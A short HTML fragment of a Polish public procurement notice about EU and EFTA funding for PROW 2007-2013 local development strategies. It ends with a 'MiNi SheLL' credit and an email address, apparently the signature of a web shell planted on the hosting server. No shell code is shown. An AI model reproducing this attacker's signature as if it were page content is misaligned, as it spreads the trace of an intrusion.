Wdrażanie lokalnych strategii rozwoju PROW na lata 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com